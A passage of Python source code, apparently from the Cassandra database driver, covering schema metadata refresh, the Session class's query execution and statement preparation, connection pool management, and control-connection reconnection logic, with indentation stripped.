raise ValueError("keyspace is required to refresh specific sub-entity {table, usertype, function, aggregate}")
if sum(1 for e in (table, usertype, function, aggregate) if e) > 1:
raise ValueError("{table, usertype, function, aggregate} are mutually exclusive")
@staticmethod
def _target_type_from_refresh_args(keyspace, table, usertype, function, aggregate):
if aggregate:
return SchemaTargetType.AGGREGATE
elif function:
return SchemaTargetType.FUNCTION
elif usertype:
return SchemaTargetType.TYPE
elif table:
return SchemaTargetType.TABLE
elif keyspace:
return SchemaTargetType.KEYSPACE
return None
def refresh_schema_metadata(self, max_schema_agreement_wait=None):
"""
Synchronously refresh all schema metadata.
By default, the timeout for this operation is governed by :attr:`~.Cluster.max_schema_agreement_wait`
and :attr:`~.Cluster.control_connection_timeout`.
Passing max_schema_agreement_wait here overrides :attr:`~.Cluster.max_schema_agreement_wait`.
Setting max_schema_agreement_wait <= 0 will bypass schema agreement and refresh schema immediately.
An Exception is raised if schema refresh fails for any reason.
"""
if not self.control_connection.refresh_schema(schema_agreement_wait=max_schema_agreement_wait, force=True):
raise DriverException("Schema metadata was not refreshed. See log for details.")
def refresh_keyspace_metadata(self, keyspace, max_schema_agreement_wait=None):
"""
Synchronously refresh keyspace metadata. This applies to keyspace-level information such as replication
and durability settings. It does not refresh tables, types, etc. contained in the keyspace.
See :meth:`~.Cluster.refresh_schema_metadata` for description of ``max_schema_agreement_wait`` behavior
"""
if not self.control_connection.refresh_schema(target_type=SchemaTargetType.KEYSPACE, keyspace=keyspace,
schema_agreement_wait=max_schema_agreement_wait, force=True):
raise DriverException("Keyspace metadata was not refreshed. See log for details.")
def refresh_table_metadata(self, keyspace, table, max_schema_agreement_wait=None):
"""
Synchronously refresh table metadata. This applies to a table, and any triggers or indexes attached
to the table.
See :meth:`~.Cluster.refresh_schema_metadata` for description of ``max_schema_agreement_wait`` behavior
"""
if not self.control_connection.refresh_schema(target_type=SchemaTargetType.TABLE, keyspace=keyspace, table=table,
schema_agreement_wait=max_schema_agreement_wait, force=True):
raise DriverException("Table metadata was not refreshed. See log for details.")
def refresh_materialized_view_metadata(self, keyspace, view, max_schema_agreement_wait=None):
"""
Synchronously refresh materialized view metadata.
See :meth:`~.Cluster.refresh_schema_metadata` for description of ``max_schema_agreement_wait`` behavior
"""
if not self.control_connection.refresh_schema(target_type=SchemaTargetType.TABLE, keyspace=keyspace, table=view,
schema_agreement_wait=max_schema_agreement_wait, force=True):
raise DriverException("View metadata was not refreshed. See log for details.")
def refresh_user_type_metadata(self, keyspace, user_type, max_schema_agreement_wait=None):
"""
Synchronously refresh user defined type metadata.
See :meth:`~.Cluster.refresh_schema_metadata` for description of ``max_schema_agreement_wait`` behavior
"""
if not self.control_connection.refresh_schema(target_type=SchemaTargetType.TYPE, keyspace=keyspace, type=user_type,
schema_agreement_wait=max_schema_agreement_wait, force=True):
raise DriverException("User Type metadata was not refreshed. See log for details.")
def refresh_user_function_metadata(self, keyspace, function, max_schema_agreement_wait=None):
"""
Synchronously refresh user defined function metadata.
``function`` is a :class:`cassandra.UserFunctionDescriptor`.
See :meth:`~.Cluster.refresh_schema_metadata` for description of ``max_schema_agreement_wait`` behavior
"""
if not self.control_connection.refresh_schema(target_type=SchemaTargetType.FUNCTION, keyspace=keyspace, function=function,
schema_agreement_wait=max_schema_agreement_wait, force=True):
raise DriverException("User Function metadata was not refreshed. See log for details.")
def refresh_user_aggregate_metadata(self, keyspace, aggregate, max_schema_agreement_wait=None):
"""
Synchronously refresh user defined aggregate metadata.
``aggregate`` is a :class:`cassandra.UserAggregateDescriptor`.
See :meth:`~.Cluster.refresh_schema_metadata` for description of ``max_schema_agreement_wait`` behavior
"""
if not self.control_connection.refresh_schema(target_type=SchemaTargetType.AGGREGATE, keyspace=keyspace, aggregate=aggregate,
schema_agreement_wait=max_schema_agreement_wait, force=True):
raise DriverException("User Aggregate metadata was not refreshed. See log for details.")
def refresh_nodes(self):
"""
Synchronously refresh the node list and token metadata
An Exception is raised if node refresh fails for any reason.
"""
if not self.control_connection.refresh_node_list_and_token_map():
raise DriverException("Node list was not refreshed. See log for details.")
def set_meta_refresh_enabled(self, enabled):
"""
*Deprecated:* set :attr:`~.Cluster.schema_metadata_enabled` and :attr:`~.Cluster.token_metadata_enabled` instead
Sets a flag to enable (True) or disable (False) all metadata refresh queries.
This applies to both schema and node topology.
Disabling this is useful to minimize refreshes during multiple changes.
Meta refresh must be enabled for the driver to become aware of any cluster
topology changes or schema updates.
"""
self.schema_metadata_enabled = enabled
self.token_metadata_enabled = enabled
def _prepare_all_queries(self, host):
if not self._prepared_statements or not self.reprepare_on_up:
return
log.debug("Preparing all known prepared statements against host %s", host)
connection = None
try:
connection = self.connection_factory(host.address)
statements = self._prepared_statements.values()
for keyspace, ks_statements in groupby(statements, lambda s: s.keyspace):
if keyspace is not None:
connection.set_keyspace_blocking(keyspace)
# prepare 10 statements at a time
ks_statements = list(ks_statements)
chunks = []
for i in range(0, len(ks_statements), 10):
chunks.append(ks_statements[i:i + 10])
for ks_chunk in chunks:
messages = [PrepareMessage(query=s.query_string) for s in ks_chunk]
# TODO: make this timeout configurable somehow?
responses = connection.wait_for_responses(*messages, timeout=5.0, fail_on_error=False)
for success, response in responses:
if not success:
log.debug("Got unexpected response when preparing "
"statement on host %s: %r", host, response)
log.debug("Done preparing all known prepared statements against host %s", host)
except OperationTimedOut as timeout:
log.warning("Timed out trying to prepare all statements on host %s: %s", host, timeout)
except (ConnectionException, socket.error) as exc:
log.warning("Error trying to prepare all statements on host %s: %r", host, exc)
except Exception:
log.exception("Error trying to prepare all statements on host %s", host)
finally:
if connection:
connection.close()
def add_prepared(self, query_id, prepared_statement):
with self._prepared_statement_lock:
self._prepared_statements[query_id] = prepared_statement
class Session(object):
"""
A collection of connection pools for each host in the cluster.
Instances of this class should not be created directly, only
using :meth:`.Cluster.connect()`.
Queries and statements can be executed through ``Session`` instances
using the :meth:`~.Session.execute()` and :meth:`~.Session.execute_async()`
methods.
Example usage::
>>> session = cluster.connect()
>>> session.set_keyspace("mykeyspace")
>>> session.execute("SELECT * FROM mycf")
"""
cluster = None
hosts = None
keyspace = None
is_shutdown = False
row_factory = staticmethod(named_tuple_factory)
"""
The format to return row results in. By default, each
returned row will be a named tuple. You can alternatively
use any of the following:
- :func:`cassandra.query.tuple_factory` - return a result row as a tuple
- :func:`cassandra.query.named_tuple_factory` - return a result row as a named tuple
- :func:`cassandra.query.dict_factory` - return a result row as a dict
- :func:`cassandra.query.ordered_dict_factory` - return a result row as an OrderedDict
"""
default_timeout = 10.0
"""
A default timeout, measured in seconds, for queries executed through
:meth:`.execute()` or :meth:`.execute_async()`. This default may be
overridden with the `timeout` parameter for either of those methods.
Setting this to :const:`None` will cause no timeouts to be set by default.
Please see :meth:`.ResponseFuture.result` for details on the scope and
effect of this timeout.
.. versionadded:: 2.0.0
"""
default_consistency_level = ConsistencyLevel.LOCAL_ONE
"""
The default :class:`~ConsistencyLevel` for operations executed through
this session. This default may be overridden by setting the
:attr:`~.Statement.consistency_level` on individual statements.
.. versionadded:: 1.2.0
.. versionchanged:: 3.0.0
default changed from ONE to LOCAL_ONE
"""
default_serial_consistency_level = None
"""
The default :class:`~ConsistencyLevel` for serial phase of conditional updates executed through
this session. This default may be overridden by setting the
:attr:`~.Statement.serial_consistency_level` on individual statements.
Only valid for ``protocol_version >= 2``.
"""
max_trace_wait = 2.0
"""
The maximum amount of time (in seconds) the driver will wait for trace
details to be populated server-side for a query before giving up.
If the `trace` parameter for :meth:`~.execute()` or :meth:`~.execute_async()`
is :const:`True`, the driver will repeatedly attempt to fetch trace
details for the query (using exponential backoff) until this limit is
hit. If the limit is passed, an error will be logged and the
:attr:`.Statement.trace` will be left as :const:`None`. """
default_fetch_size = 5000
"""
By default, this many rows will be fetched at a time. Setting
this to :const:`None` will disable automatic paging for large query
results. The fetch size can be also specified per-query through
:attr:`.Statement.fetch_size`.
This only takes effect when protocol version 2 or higher is used.
See :attr:`.Cluster.protocol_version` for details.
.. versionadded:: 2.0.0
"""
use_client_timestamp = True
"""
When using protocol version 3 or higher, write timestamps may be supplied
client-side at the protocol level. (Normally they are generated
server-side by the coordinator node.) Note that timestamps specified
within a CQL query will override this timestamp.
.. versionadded:: 2.1.0
"""
encoder = None
"""
A :class:`~cassandra.encoder.Encoder` instance that will be used when
formatting query parameters for non-prepared statements. This is not used
for prepared statements (because prepared statements give the driver more
information about what CQL types are expected, allowing it to accept a
wider range of python types).
The encoder uses a mapping from python types to encoder methods (for
specific CQL types). This mapping can be modified by users as they see
fit. Methods of :class:`~cassandra.encoder.Encoder` should be used for mapping
values if possible, because they take precautions to avoid injections and
properly sanitize data.
Example::
cluster = Cluster()
session = cluster.connect("mykeyspace")
session.encoder.mapping[tuple] = session.encoder.cql_encode_tuple
session.execute("CREATE TABLE mytable (k int PRIMARY KEY, col tuple<int, ascii>)")
session.execute("INSERT INTO mytable (k, col) VALUES (%s, %s)", [0, (123, 'abc')])
.. versionadded:: 2.1.0
"""
client_protocol_handler = ProtocolHandler
"""
Specifies a protocol handler that will be used for client-initiated requests (i.e. not
internal driver requests). This can be used to override or extend features such as
message or type serialization/deserialization.
The default pure python implementation is :class:`cassandra.protocol.ProtocolHandler`.
When compiled with Cython, there are also built-in faster alternatives. See :ref:`faster_deser`
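As a sketch, a hypothetical ``MyProtocolHandler`` subclass of
:class:`cassandra.protocol.ProtocolHandler` could be installed per session::
>>> session.client_protocol_handler = MyProtocolHandler
>>> session.execute("SELECT * FROM mytable")  # handled by MyProtocolHandler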
"""
_lock = None
_pools = None
_load_balancer = None
_metrics = None
def __init__(self, cluster, hosts):
self.cluster = cluster
self.hosts = hosts
self._lock = RLock()
self._pools = {}
self._load_balancer = cluster.load_balancing_policy
self._metrics = cluster.metrics
self._protocol_version = self.cluster.protocol_version
self.encoder = Encoder()
# create connection pools in parallel
futures = []
for host in hosts:
future = self.add_or_renew_pool(host, is_host_addition=False)
if future is not None:
futures.append(future)
for future in futures:
future.result()
def execute(self, query, parameters=None, timeout=_NOT_SET, trace=False, custom_payload=None):
"""
Execute the given query and synchronously wait for the response.
If an error is encountered while executing the query, an Exception
will be raised.
`query` may be a query string or an instance of :class:`cassandra.query.Statement`.
`parameters` may be a sequence or dict of parameters to bind. If a
sequence is used, ``%s`` should be used as the placeholder for each
argument. If a dict is used, ``%(name)s`` style placeholders must
be used.
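For example (a sketch; the ``users`` table is hypothetical)::
>>> session.execute("INSERT INTO users (id, name) VALUES (%s, %s)",
...                 (1, "alice"))
>>> session.execute("INSERT INTO users (id, name) VALUES (%(id)s, %(name)s)",
...                 {"id": 2, "name": "bob"})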
`timeout` should specify a floating-point timeout (in seconds) after
which an :exc:`.OperationTimedOut` exception will be raised if the query
has not completed. If not set, the timeout defaults to
:attr:`~.Session.default_timeout`. If set to :const:`None`, there is
no timeout. Please see :meth:`.ResponseFuture.result` for details on
the scope and effect of this timeout.
If `trace` is set to :const:`True`, the query will be sent with tracing enabled.
The trace details can be obtained using the returned :class:`.ResultSet` object.
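The trace can also be fetched from the future when using
:meth:`~.Session.execute_async` (a sketch; ``mytable`` is hypothetical)::
>>> future = session.execute_async("SELECT * FROM mytable", trace=True)
>>> rows = future.result()
>>> trace = future.get_query_trace()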
`custom_payload` is a :ref:`custom_payload` dict to be passed to the server.
If `query` is a Statement with its own custom_payload, the message payload
will be a union of the two, with the values specified here taking precedence.
"""
return self.execute_async(query, parameters, trace, custom_payload, timeout).result()
def execute_async(self, query, parameters=None, trace=False, custom_payload=None, timeout=_NOT_SET):
"""
Execute the given query and return a :class:`~.ResponseFuture` object
which callbacks may be attached to for asynchronous response
delivery. You may also call :meth:`~.ResponseFuture.result()`
on the :class:`.ResponseFuture` to synchronously block for results at
any time.
If `trace` is set to :const:`True`, you may get the query trace descriptors using
:meth:`.ResponseFuture.get_query_trace()` or :meth:`.ResponseFuture.get_all_query_traces()`
on the future result.
`custom_payload` is a :ref:`custom_payload` dict to be passed to the server.
If `query` is a Statement with its own custom_payload, the message payload
will be a union of the two, with the values specified here taking precedence.
If the server sends a custom payload in the response message,
the dict can be obtained following :meth:`.ResponseFuture.result` via
:attr:`.ResponseFuture.custom_payload`
Example usage::
>>> session = cluster.connect()
>>> future = session.execute_async("SELECT * FROM mycf")
>>> def log_results(results):
... for row in results:
... log.info("Results: %s", row)
>>> def log_error(exc):
... log.error("Operation failed: %s", exc)
>>> future.add_callbacks(log_results, log_error)
Async execution with blocking wait for results::
>>> future = session.execute_async("SELECT * FROM mycf")
>>> # do other stuff...
>>> try:
... results = future.result()
... except Exception:
... log.exception("Operation failed:")
"""
if timeout is _NOT_SET:
timeout = self.default_timeout
future = self._create_response_future(query, parameters, trace, custom_payload, timeout)
future._protocol_handler = self.client_protocol_handler
future.send_request()
return future
def _create_response_future(self, query, parameters, trace, custom_payload, timeout):
""" Returns the ResponseFuture before calling send_request() on it """
prepared_statement = None
if isinstance(query, six.string_types):
query = SimpleStatement(query)
elif isinstance(query, PreparedStatement):
query = query.bind(parameters)
cl = query.consistency_level if query.consistency_level is not None else self.default_consistency_level
serial_cl = query.serial_consistency_level if query.serial_consistency_level is not None else self.default_serial_consistency_level
fetch_size = query.fetch_size
if fetch_size is FETCH_SIZE_UNSET and self._protocol_version >= 2:
fetch_size = self.default_fetch_size
elif self._protocol_version == 1:
fetch_size = None
if self._protocol_version >= 3 and self.use_client_timestamp:
timestamp = int(time.time() * 1e6)
else:
timestamp = None
if isinstance(query, SimpleStatement):
query_string = query.query_string
if parameters:
query_string = bind_params(query_string, parameters, self.encoder)
message = QueryMessage(
query_string, cl, serial_cl,
fetch_size, timestamp=timestamp)
elif isinstance(query, BoundStatement):
message = ExecuteMessage(
query.prepared_statement.query_id, query.values, cl,
serial_cl, fetch_size,
timestamp=timestamp)
prepared_statement = query.prepared_statement
elif isinstance(query, BatchStatement):
if self._protocol_version < 2:
raise UnsupportedOperation(
"BatchStatement execution is only supported with protocol version "
"2 or higher (supported in Cassandra 2.0 and higher). Consider "
"setting Cluster.protocol_version to 2 to support this operation.")
message = BatchMessage(
query.batch_type, query._statements_and_parameters, cl,
serial_cl, timestamp)
message.tracing = trace
message.update_custom_payload(query.custom_payload)
message.update_custom_payload(custom_payload)
return ResponseFuture(
self, message, query, timeout, metrics=self._metrics,
prepared_statement=prepared_statement)
def prepare(self, query, custom_payload=None):
"""
Prepares a query string, returning a :class:`~cassandra.query.PreparedStatement`
instance which can be used as follows::
>>> session = cluster.connect("mykeyspace")
>>> query = "INSERT INTO users (id, name, age) VALUES (?, ?, ?)"
>>> prepared = session.prepare(query)
>>> session.execute(prepared, (user.id, user.name, user.age))
Or you may bind values to the prepared statement ahead of time::
>>> prepared = session.prepare(query)
>>> bound_stmt = prepared.bind((user.id, user.name, user.age))
>>> session.execute(bound_stmt)
Of course, prepared statements may (and should) be reused::
>>> prepared = session.prepare(query)
>>> for user in users:
... bound = prepared.bind((user.id, user.name, user.age))
... session.execute(bound)
**Important**: PreparedStatements should be prepared only once.
Preparing the same query more than once will likely affect performance.
`custom_payload` is a key value map to be passed along with the prepare
message. See :ref:`custom_payload`.
"""
message = PrepareMessage(query=query)
future = ResponseFuture(self, message, query=None, timeout=self.default_timeout)
try:
future.send_request()
query_id, column_metadata, pk_indexes = future.result()
except Exception:
log.exception("Error preparing query:")
raise
prepared_statement = PreparedStatement.from_message(
query_id, column_metadata, pk_indexes, self.cluster.metadata, query, self.keyspace,
self._protocol_version)
prepared_statement.custom_payload = future.custom_payload
self.cluster.add_prepared(query_id, prepared_statement)
if self.cluster.prepare_on_all_hosts:
host = future._current_host
try:
self.prepare_on_all_hosts(prepared_statement.query_string, host)
except Exception:
log.exception("Error preparing query on all hosts:")
return prepared_statement
def prepare_on_all_hosts(self, query, excluded_host):
"""
Prepare the given query on all hosts, excluding ``excluded_host``.
Intended for internal use only.
"""
futures = []
for host in self._pools.keys():
if host != excluded_host and host.is_up:
future = ResponseFuture(self, PrepareMessage(query=query), None, self.default_timeout)
# we don't care about errors preparing against specific hosts,
# since we can always prepare them as needed when the prepared
# statement is used. Just log errors and continue on.
try:
request_id = future._query(host)
except Exception:
log.exception("Error preparing query for host %s:", host)
continue
if request_id is None:
# the error has already been logged by ResponseFuture
log.debug("Failed to prepare query for host %s: %r",
host, future._errors.get(host))
continue
futures.append((host, future))
for host, future in futures:
try:
future.result()
except Exception:
log.exception("Error preparing query for host %s:", host)
def shutdown(self):
"""
Close all connections. ``Session`` instances should not be used
for any purpose after being shutdown.
"""
with self._lock:
if self.is_shutdown:
return
else:
self.is_shutdown = True
for pool in self._pools.values():
pool.shutdown()
def __enter__(self):
return self
def __exit__(self, *args):
self.shutdown()
def add_or_renew_pool(self, host, is_host_addition):
"""
For internal use only.
"""
distance = self._load_balancer.distance(host)
if distance == HostDistance.IGNORED:
return None
def run_add_or_renew_pool():
try:
if self._protocol_version >= 3:
new_pool = HostConnection(host, distance, self)
else:
new_pool = HostConnectionPool(host, distance, self)
except AuthenticationFailed as auth_exc:
conn_exc = ConnectionException(str(auth_exc), host=host)
self.cluster.signal_connection_failure(host, conn_exc, is_host_addition)
return False
except Exception as conn_exc:
log.warning("Failed to create connection pool for new host %s:",
host, exc_info=conn_exc)
# the host itself will still be marked down, so we need to pass
# a special flag to make sure the reconnector is created
self.cluster.signal_connection_failure(
host, conn_exc, is_host_addition, expect_host_to_be_down=True)
return False
previous = self._pools.get(host)
self._pools[host] = new_pool
log.debug("Added pool for host %s to session", host)
if previous:
previous.shutdown()
return True
return self.submit(run_add_or_renew_pool)
def remove_pool(self, host):
pool = self._pools.pop(host, None)
if pool:
log.debug("Removed connection pool for %r", host)
return self.submit(pool.shutdown)
else:
return None
def update_created_pools(self):
"""
When the set of live nodes changes, the load balancer may change its
mind about host distances. It might change the distance for the node that
came or left, but also for other nodes (for instance, if a node dies,
another previously ignored node may now be considered).
This method ensures that all hosts for which a pool should exist
have one, and hosts that shouldn't don't.
For internal use only.
"""
for host in self.cluster.metadata.all_hosts():
distance = self._load_balancer.distance(host)
pool = self._pools.get(host)
if not pool or pool.is_shutdown:
# we don't eagerly set is_up on previously ignored hosts. None is included here
# to allow us to attempt connections to hosts that have gone from ignored to something
# else.
if distance != HostDistance.IGNORED and host.is_up in (True, None):
self.add_or_renew_pool(host, False)
elif distance != pool.host_distance:
# the distance has changed
if distance == HostDistance.IGNORED:
self.remove_pool(host)
else:
pool.host_distance = distance
def on_down(self, host):
"""
Called by the parent Cluster instance when a node is marked down.
Only intended for internal use.
"""
future = self.remove_pool(host)
if future:
future.add_done_callback(lambda f: self.update_created_pools())
def on_remove(self, host):
""" Internal """
self.on_down(host)
def set_keyspace(self, keyspace):
"""
Set the default keyspace for all queries made through this Session.
This operation blocks until complete.
"""
self.execute('USE %s' % (protect_name(keyspace),))
def _set_keyspace_for_all_pools(self, keyspace, callback):
"""
Asynchronously sets the keyspace on all pools. When all
pools have set all of their connections, `callback` will be
called with a dictionary of all errors that occurred, keyed
by the `Host` that they occurred against.
"""
self.keyspace = keyspace
remaining_callbacks = set(self._pools.values())
errors = {}
if not remaining_callbacks:
callback(errors)
return
def pool_finished_setting_keyspace(pool, host_errors):
remaining_callbacks.remove(pool)
if host_errors:
errors[pool.host] = host_errors
if not remaining_callbacks:
callback(host_errors)
for pool in self._pools.values():
pool._set_keyspace_for_all_conns(keyspace, pool_finished_setting_keyspace)
def user_type_registered(self, keyspace, user_type, klass):
"""
Called by the parent Cluster instance when the user registers a new
mapping from a user-defined type to a class. Intended for internal
use only.
"""
try:
ks_meta = self.cluster.metadata.keyspaces[keyspace]
except KeyError:
raise UserTypeDoesNotExist(
'Keyspace %s does not exist or has not been discovered by the driver' % (keyspace,))
try:
type_meta = ks_meta.user_types[user_type]
except KeyError:
raise UserTypeDoesNotExist(
'User type %s does not exist in keyspace %s' % (user_type, keyspace))
field_names = type_meta.field_names
if six.PY2:
# go from unicode to string to avoid decode errors from implicit
# decode when formatting non-ascii values
field_names = [fn.encode('utf-8') for fn in field_names]
def encode(val):
return '{ %s }' % ' , '.join('%s : %s' % (
field_name,
self.encoder.cql_encode_all_types(getattr(val, field_name, None))
) for field_name in field_names)
self.encoder.mapping[klass] = encode
def submit(self, fn, *args, **kwargs):
""" Internal """
if not self.is_shutdown:
return self.cluster.executor.submit(fn, *args, **kwargs)
def get_pool_state(self):
return dict((host, pool.get_state()) for host, pool in self._pools.items())
def get_pools(self):
return self._pools.values()
class UserTypeDoesNotExist(Exception):
"""
An attempt was made to use a user-defined type that does not exist.
.. versionadded:: 2.1.0
"""
pass
class _ControlReconnectionHandler(_ReconnectionHandler):
"""
Internal
"""
def __init__(self, control_connection, *args, **kwargs):
_ReconnectionHandler.__init__(self, *args, **kwargs)
self.control_connection = weakref.proxy(control_connection)
def try_reconnect(self):
return self.control_connection._reconnect_internal()
def on_reconnection(self, connection):
self.control_connection._set_new_connection(connection)
def on_exception(self, exc, next_delay):
# TODO only overridden to add logging, so add logging
if isinstance(exc, AuthenticationFailed):
return False
else:
log.debug("Error trying to reconnect control connection: %r", exc)
return True
def _watch_callback(obj_weakref, method_name, *args, **kwargs):
"""
A callback handler for the ControlConnection that tolerates
weak references.
"""
obj = obj_weakref()
if obj is None:
return
getattr(obj, method_name)(*args, **kwargs)
def _clear_watcher(conn, expiring_weakref):
"""
Called when the ControlConnection object is about to be finalized.
This clears watchers on the underlying Connection object.
"""
try:
conn.control_conn_disposed()
except ReferenceError:
pass
class ControlConnection(object):
"""
Internal
"""
_SELECT_PEERS = "SELECT * FROM system.peers"
_SELECT_PEERS_NO_TOKENS = "SELECT peer, data_center, rack, rpc_address, release_version, schema_version FROM system.peers"
_SELECT_LOCAL = "SELECT * FROM system.local WHERE key='local'"
_SELECT_LOCAL_NO_TOKENS = "SELECT cluster_name, data_center, rack, partitioner, release_version, schema_version FROM system.local WHERE key='local'"
_SELECT_SCHEMA_PEERS = "SELECT peer, rpc_address, schema_version FROM system.peers"
_SELECT_SCHEMA_LOCAL = "SELECT schema_version FROM system.local WHERE key='local'"
_is_shutdown = False
_timeout = None
_protocol_version = None
_schema_event_refresh_window = None
_topology_event_refresh_window = None
_status_event_refresh_window = None
_schema_meta_enabled = True
_token_meta_enabled = True
# for testing purposes
_time = time
def __init__(self, cluster, timeout,
schema_event_refresh_window,
topology_event_refresh_window,
status_event_refresh_window,
schema_meta_enabled=True,
token_meta_enabled=True):
# use a weak reference to allow the Cluster instance to be GC'ed (and
# shutdown) since implementing __del__ disables the cycle detector
self._cluster = weakref.proxy(cluster)
self._connection = None
self._timeout = timeout
self._schema_event_refresh_window = schema_event_refresh_window
self._topology_event_refresh_window = topology_event_refresh_window
self._status_event_refresh_window = status_event_refresh_window
self._schema_meta_enabled = schema_meta_enabled
self._token_meta_enabled = token_meta_enabled
self._lock = RLock()
self._schema_agreement_lock = Lock()
self._reconnection_handler = None
self._reconnection_lock = RLock()
self._event_schedule_times = {}
def connect(self):
if self._is_shutdown:
return
self._protocol_version = self._cluster.protocol_version
self._set_new_connection(self._reconnect_internal())
def _set_new_connection(self, conn):
"""
Replace existing connection (if there is one) and close it.
"""
with self._lock:
old = self._connection
self._connection = conn
if old:
log.debug("[control connection] Closing old connection %r, replacing with %r", old, conn)
old.close()
def _reconnect_internal(self):
"""
Tries to connect to each host in the query plan until one succeeds
or every attempt fails. If successful, a new Connection will be
returned. Otherwise, :exc:`NoHostAvailable` will be raised
with an "errors" arg that is a dict mapping host addresses
to the exception that was raised when an attempt was made to open
a connection to that host.
"""
errors = {}
for host in self._cluster.load_balancing_policy.make_query_plan():
try:
return self._try_connect(host)
except ConnectionException as exc:
errors[host.address] = exc
log.warning("[control connection] Error connecting to %s:", host, exc_info=True)
self._cluster.signal_connection_failure(host, exc, is_host_addition=False)
except Exception as exc:
errors[host.address] = exc
log.warning("[control connection] Error connecting to %s:", host, exc_info=True)
if self._is_shutdown:
raise DriverException("[control connection] Reconnection in progress during shutdown")
raise NoHostAvailable("Unable to connect to any servers", errors)
def _try_connect(self, host):
"""
Creates a new Connection, registers for pushed events, and refreshes
node/token and schema metadata.
"""
log.debug("[control connection] Opening new connection to %s", host)
while True:
try:
connection = self._cluster.connection_factory(host.address, is_control_connection=True)
if self._is_shutdown:
connection.close()
raise DriverException("Reconnecting during shutdown")
break
except ProtocolVersionUnsupported as e:
self._cluster.protocol_downgrade(host.address, e.startup_version)
log.debug("[control connection] Established new connection %r, "
"registering watchers and refreshing schema and topology",
connection)
# use weak references in both directions
# _clear_watcher will be called when this ControlConnection is about to be finalized
# _watch_callback will get the actual callback from the Connection and relay it to
# this object (after dereferencing a weakref)
self_weakref = weakref.ref(self, partial(_clear_watcher, weakref.proxy(connection)))
try:
connection.register_watchers({
"TOPOLOGY_CHANGE": partial(_watch_callback, self_weakref, '_handle_topology_change'),
"STATUS_CHANGE": partial(_watch_callback, self_weakref, '_handle_status_change'),
"SCHEMA_CHANGE": partial(_watch_callback, self_weakref, '_handle_schema_change')
}, register_timeout=self._timeout)
sel_peers = self._SELECT_PEERS if self._token_meta_enabled else self._SELECT_PEERS_NO_TOKENS
sel_local = self._SELECT_LOCAL if self._token_meta_enabled else self._SELECT_LOCAL_NO_TOKENS
peers_query = QueryMessage(query=sel_peers, consistency_level=ConsistencyLevel.ONE)
local_query = QueryMessage(query=sel_local, consistency_level=ConsistencyLevel.ONE)
shared_results = connection.wait_for_responses(
peers_query, local_query, timeout=self._timeout)
self._refresh_node_list_and_token_map(connection, preloaded_results=shared_results)
self._refresh_schema(connection, preloaded_results=shared_results, schema_agreement_wait=-1)
except Exception:
connection.close()
raise
return connection
def reconnect(self):
if self._is_shutdown:
return
self._submit(self._reconnect)
def _reconnect(self):
log.debug("[control connection] Attempting to reconnect")
try:
self._set_new_connection(self._reconnect_internal())
except NoHostAvailable:
# make a retry schedule (which includes backoff)
schedule = self._cluster.reconnection_policy.new_schedule()
with self._reconnection_lock:
# cancel existing reconnection attempts
if self._reconnection_handler:
self._reconnection_handler.cancel()
# when a connection is successfully made, _set_new_connection
# will be called with the new connection and then our
# _reconnection_handler will be cleared out
self._reconnection_handler = _ControlReconnectionHandler(
self, self._cluster.scheduler, schedule,
self._get_and_set_reconnection_handler,
new_handler=None)
self._reconnection_handler.start()
except Exception:
log.debug("[control connection] error reconnecting", exc_info=True)
raise
def _get_and_set_reconnection_handler(self, new_handler):
"""
Called by the _ControlReconnectionHandler when a new connection
is successfully created. Clears out the _reconnection_handler on
this ControlConnection.
"""
with self._reconnection_lock:
old = self._reconnection_handler
self._reconnection_handler = new_handler
return old
def _submit(self, *args, **kwargs):
try:
if not self._cluster.is_shutdown:
return self._cluster.executor.submit(*args, **kwargs)
except ReferenceError:
pass
return None
def shutdown(self):
# stop trying to reconnect (if we are)
with self._reconnection_lock:
if self._reconnection_handler:
self._reconnection_handler.cancel()
with self._lock:
if self._is_shutdown:
return
else:
self._is_shutdown = True
log.debug("Shutting down control connection")
if self._connection:
self._connection.close()
self._connection = None
def refresh_schema(self, force=False, **kwargs):
try:
if self._connection:
return self._refresh_schema(self._connection, force=force, **kwargs)
except ReferenceError:
pass # our weak reference to the Cluster is no good
except Exception:
log.debug("[control connection] Error refreshing schema", exc_info=True)
self._signal_error()
return False
def _refresh_schema(self, connection, preloaded_results=None, schema_agreement_wait=None, force=False, **kwargs):
if self._cluster.is_shutdown:
return False
agreed = self.wait_for_schema_agreement(connection,
preloaded_results=preloaded_results,
wait_time=schema_agreement_wait)
if not self._schema_meta_enabled and not force:
log.debug("[control connection] Skipping schema refresh because schema metadata is disabled")
return False
if not agreed:
log.debug("Skipping schema refresh due to lack of schema agreement")
return False
self._cluster.metadata.refresh(connection, self._timeout, **kwargs)
return True
def refresh_node_list_and_token_map(self, force_token_rebuild=False):
try:
if self._connection:
self._refresh_node_list_and_token_map(self._connection, force_token_rebuild=force_token_rebuild)
return True
except ReferenceError:
pass # our weak reference to the Cluster is no good
except Exception:
log.debug("[control connection] Error refreshing node list and token map", exc_info=True)
self._signal_error()
return False
def _refresh_node_list_and_token_map(self, connection, preloaded_results=None,
force_token_rebuild=False):
if preloaded_results:
log.debug("[control connection] Refreshing node list and token map using preloaded results")
peers_result = preloaded_results[0]
local_result = preloaded_results[1]
else:
cl = ConsistencyLevel.ONE
if not self._token_meta_enabled:
log.debug("[control connection] Refreshing node list without token map")
sel_peers = self._SELECT_PEERS_NO_TOKENS
sel_local = self._SELECT_LOCAL_NO_TOKENS
else:
log.debug("[control connection] Refreshing node list and token map")
sel_peers = self._SELECT_PEERS
sel_local = self._SELECT_LOCAL
peers_query = QueryMessage(query=sel_peers, consistency_level=cl)
local_query = QueryMessage(query=sel_local, consistency_level=cl)
peers_result, local_result = connection.wait_for_responses(
peers_query, local_query, timeout=self._timeout)
peers_result = dict_factory(*peers_result.results)
partitioner = None
token_map = {}
found_hosts = set()
if local_result.results:
found_hosts.add(connection.host)
local_rows = dict_factory(*(local_result.results))
local_row = local_rows[0]
cluster_name = local_row["cluster_name"]
self._cluster.metadata.cluster_name = cluster_name
partitioner = local_row.get("partitioner")
tokens = local_row.get("tokens")
host = self._cluster.metadata.get_host(connection.host)
if host:
datacenter = local_row.get("data_center")
rack = local_row.get("rack")
self._update_location_info(host, datacenter, rack)
host.listen_address = local_row.get("listen_address")
host.broadcast_address = local_row.get("broadcast_address")
host.release_version = local_row.get("release_version")
host.dse_version = local_row.get("dse_version")
host.dse_workload = local_row.get("workload")
if partitioner and tokens:
token_map[host] = tokens
# Check metadata.partitioner to see if we haven't built anything yet. If
# every node in the cluster was in the contact points, we won't discover
# any new nodes, so we need this additional check. (See PYTHON-90)
should_rebuild_token_map = force_token_rebuild or self._cluster.metadata.partitioner is None
for row in peers_result:
addr = self._rpc_from_peer_row(row)
